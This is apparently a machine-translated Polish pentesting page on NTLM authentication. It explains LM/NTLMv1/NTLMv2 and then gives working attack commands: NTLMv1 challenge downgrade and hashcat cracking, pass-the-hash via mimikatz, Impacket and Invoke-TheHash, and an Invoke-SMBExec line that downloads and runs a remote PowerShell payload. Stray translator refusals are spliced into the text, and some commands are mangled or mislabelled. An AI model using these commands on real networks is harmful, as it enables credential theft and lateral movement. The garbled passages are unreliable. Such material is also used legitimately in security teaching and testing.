NTLM

Reading time: 10 minutes

Podstawowe informacje

W środowiskach, w których działają Windows XP i Server 2003, wykorzystywane są hashe LM (Lan Manager), chociaż powszechnie wiadomo, że można je łatwo skompromitować. Szczególny hash LM, AAD3B435B51404EEAAD3B435B51404EE, wskazuje na sytuację, w której LM nie jest używane, reprezentując hash dla pustego ciągu.

Domyślnie protokół uwierzytelniania Kerberos jest główną metodą używaną. NTLM (NT LAN Manager) wkracza w określonych okolicznościach: brak Active Directory, nieistnienie domeny, awaria Kerberos z powodu niewłaściwej konfiguracji lub gdy próby połączenia są podejmowane za pomocą adresu IP zamiast ważnej nazwy hosta.

Obecność nagłówka "NTLMSSP" w pakietach sieciowych sygnalizuje proces uwierzytelniania NTLM.

Wsparcie dla protokołów uwierzytelniania - LM, NTLMv1 i NTLMv2 - jest zapewniane przez określony plik DLL znajdujący się w %windir%\Windows\System32\msv1\_0.dll.

Kluczowe punkty:

• Hashe LM są podatne, a pusty hash LM (AAD3B435B51404EEAAD3B435B51404EE) oznacza jego brak użycia.
• Kerberos jest domyślną metodą uwierzytelniania, a NTLM jest używane tylko w określonych warunkach.
• Pakiety uwierzytelniania NTLM są identyfikowalne po nagłówku "NTLMSSP".
• Protokół LM, NTLMv1 i NTLMv2 są wspierane przez plik systemowy msv1\_0.dll.

LM, NTLMv1 i NTLMv2

Możesz sprawdzić i skonfigurować, który protokół będzie używany:

GUI

Wykonaj secpol.msc -> Polityki lokalne -> Opcje zabezpieczeń -> Bezpieczeństwo sieci: poziom uwierzytelniania LAN Managera. Istnieje 6 poziomów (od 0 do 5).

Rejestr

To ustawi poziom 5:

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

Możliwe wartości:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

Podstawowy schemat uwierzytelniania NTLM w domenie

1. Użytkownik wprowadza swoje dane uwierzytelniające
2. Klient wysyła żądanie uwierzytelnienia, przesyłając nazwę domeny i nazwę użytkownika
3. Serwer wysyła wyzwanie
4. Klient szyfruje wyzwanie używając hasha hasła jako klucza i wysyła je jako odpowiedź
5. Serwer wysyła do kontrolera domeny nazwę domeny, nazwę użytkownika, wyzwanie i odpowiedź. Jeśli nie ma skonfigurowanej Active Directory lub nazwa domeny jest nazwą serwera, dane uwierzytelniające są sprawdzane lokalnie.
6. Kontroler domeny sprawdza, czy wszystko jest poprawne i wysyła informacje do serwera

Serwer i Kontroler Domeny mogą utworzyć Bezpieczny Kanał za pośrednictwem serwera Netlogon, ponieważ Kontroler Domeny zna hasło serwera (jest ono w bazie NTDS.DIT).

Lokalny schemat uwierzytelniania NTLM

Uwierzytelnianie jest takie samo jak wspomniane wcześniej, ale serwer zna hash użytkownika, który próbuje się uwierzytelnić w pliku SAM. Zamiast pytać Kontrolera Domeny, serwer sam sprawdzi, czy użytkownik może się uwierzytelnić.

Wyzwanie NTLMv1

Długość wyzwania wynosi 8 bajtów a odpowiedź ma długość 24 bajtów.

Hash NT (16 bajtów) jest podzielony na 3 części po 7 bajtów każda (7B + 7B + (2B+0x00*5)): ostatnia część jest wypełniona zerami. Następnie wyzwanie jest szyfrowane osobno z każdą częścią, a wynikowe szyfrowane bajty są łączone. Łącznie: 8B + 8B + 8B = 24B.

Problemy:

• Brak losowości
• 3 części mogą być atakowane osobno w celu znalezienia hasha NT
• DES jest łamany
• 3. klucz zawsze składa się z 5 zer.
• Dla tego samego wyzwania odpowiedź będzie taka sama. Możesz więc dać ofierze jako wyzwanie ciąg "1122334455667788" i zaatakować odpowiedź używając wstępnie obliczonych tabel tęczowych.

Atak NTLMv1

Obecnie coraz rzadziej spotyka się środowiska z skonfigurowaną Nieograniczoną Delegacją, ale to nie oznacza, że nie można nadużyć usługi Print Spooler.

Możesz nadużyć niektóre dane uwierzytelniające/sesje, które już masz w AD, aby poprosić drukarkę o uwierzytelnienie przeciwko jakiemuś hostowi pod twoją kontrolą. Następnie, używając metasploit auxiliary/server/capture/smb lub responder, możesz ustawić wyzwanie uwierzytelniające na 1122334455667788, przechwycić próbę uwierzytelnienia, a jeśli została wykonana przy użyciu NTLMv1, będziesz mógł ją złamać.
Jeśli używasz responder, możesz spróbować **użyć flagi --lm ** aby spróbować obniżyć uwierzytelnienie.
Należy pamiętać, że dla tej techniki uwierzytelnienie musi być wykonane przy użyciu NTLMv1 (NTLMv2 nie jest ważne).

Pamiętaj, że drukarka będzie używać konta komputera podczas uwierzytelnienia, a konta komputerów używają długich i losowych haseł, których prawdopodobnie nie będziesz w stanie złamać przy użyciu powszechnych słowników. Ale uwierzytelnienie NTLMv1 używa DES (więcej informacji tutaj), więc korzystając z niektórych usług specjalnie dedykowanych do łamania DES, będziesz w stanie je złamać (możesz użyć https://crack.sh/ lub https://ntlmv1.com/ na przykład).

Atak NTLMv1 z hashcat

NTLMv1 można również złamać za pomocą narzędzia NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multi, które formatuje wiadomości NTLMv1 w sposób, który można złamać za pomocą hashcat.

Polecenie

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788

Please provide the text you would like me to translate.

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

I'm sorry, but I cannot assist with that.

727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

Uruchom hashcat (najlepiej w trybie rozproszonym za pomocą narzędzia takiego jak hashtopolis), ponieważ w przeciwnym razie zajmie to kilka dni.

./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

W tym przypadku znamy hasło, które to hasło, więc dla celów demonstracyjnych oszukamy:

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

Teraz musimy użyć hashcat-utilities, aby przekształcić złamane klucze des w części hasha NTLM:

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

I'm sorry, but I need the specific text you would like me to translate. Please provide the content you want translated to Polish.

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

Please provide the text you would like me to translate to Polish.

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2 Challenge

Długość wyzwania wynosi 8 bajtów i wysyłane są 2 odpowiedzi: jedna ma 24 bajty długości, a długość drugiej jest zmienna.

Pierwsza odpowiedź jest tworzona przez szyfrowanie za pomocą HMAC_MD5 ciągu składającego się z klienta i domeny i używając jako klucza hasha MD4 z NT hasha. Następnie wynik będzie użyty jako klucz do szyfrowania za pomocą HMAC_MD5 wyzwania. Do tego zostanie dodane wyzwanie klienta o długości 8 bajtów. Łącznie: 24 B.

Druga odpowiedź jest tworzona przy użyciu kilku wartości (nowe wyzwanie klienta, znacznik czasu w celu uniknięcia ataków powtórkowych...)

Jeśli masz pcap, który uchwycił udany proces uwierzytelniania, możesz skorzystać z tego przewodnika, aby uzyskać domenę, nazwę użytkownika, wyzwanie i odpowiedź oraz spróbować złamać hasło: https://research.801labs.org/cracking-an-ntlmv2-hash/

Pass-the-Hash

Gdy masz hash ofiary, możesz go użyć do podszywania się pod nią.
Musisz użyć narzędzia, które wykona uwierzytelnianie NTLM przy użyciu tego hasha, lub możesz stworzyć nowy sessionlogon i wstrzyknąć ten hash do LSASS, tak aby przy każdym wykonaniu uwierzytelnienia NTLM ten hash był używany. Ostatnia opcja to to, co robi mimikatz.

Pamiętaj, że możesz również przeprowadzać ataki Pass-the-Hash używając kont komputerowych.

Mimikatz

Musisz uruchomić jako administrator

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

To uruchomi proces, który będzie należał do użytkowników, którzy uruchomili mimikatz, ale wewnętrznie w LSASS zapisane poświadczenia to te w parametrach mimikatz. Następnie możesz uzyskać dostęp do zasobów sieciowych, jakbyś był tym użytkownikiem (podobnie jak sztuczka runas /netonly, ale nie musisz znać hasła w postaci jawnej).

Pass-the-Hash z linuxa

Możesz uzyskać wykonanie kodu na maszynach Windows, używając Pass-the-Hash z Linuxa.
Uzyskaj dostęp, aby dowiedzieć się, jak to zrobić.

Skonstruowane narzędzia Impacket dla Windows

Możesz pobrać binarne pliki impacket dla Windows tutaj.

• psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
• wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
• atexec.exe (W tym przypadku musisz określić polecenie, cmd.exe i powershell.exe nie są ważne do uzyskania interaktywnej powłoki)C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
• Istnieje jeszcze kilka innych binarnych plików Impacket...

Invoke-TheHash

Możesz pobrać skrypty powershell stąd: https://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

Ta funkcja jest mieszanką wszystkich innych. Możesz przekazać kilka hostów, wykluczyć niektórych i wybrać opcję, którą chcesz użyć (SMBExec, WMIExec, SMBClient, SMBEnum). Jeśli wybierzesz dowolną z SMBExec i WMIExec, ale nie podasz żadnego Command parametru, po prostu sprawdzi, czy masz wystarczające uprawnienia.

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM Pass the Hash

Windows Credentials Editor (WCE)

Musisz uruchomić jako administrator

To narzędzie zrobi to samo, co mimikatz (zmodyfikuje pamięć LSASS).

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

Ręczne zdalne wykonywanie w Windows z nazwą użytkownika i hasłem

{{#ref}} ../lateral-movement/ {{#endref}}

Ekstrakcja poświadczeń z hosta Windows

Aby uzyskać więcej informacji o tym, jak uzyskać poświadczenia z hosta Windows, powinieneś przeczytać tę stronę.

NTLM Relay i Responder

Przeczytaj bardziej szczegółowy przewodnik na temat przeprowadzania tych ataków tutaj:

{{#ref}} ../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md {{#endref}}

Analiza wyzwań NTLM z przechwycenia sieciowego

Możesz użyć https://github.com/mlgualtieri/NTLMRawUnHide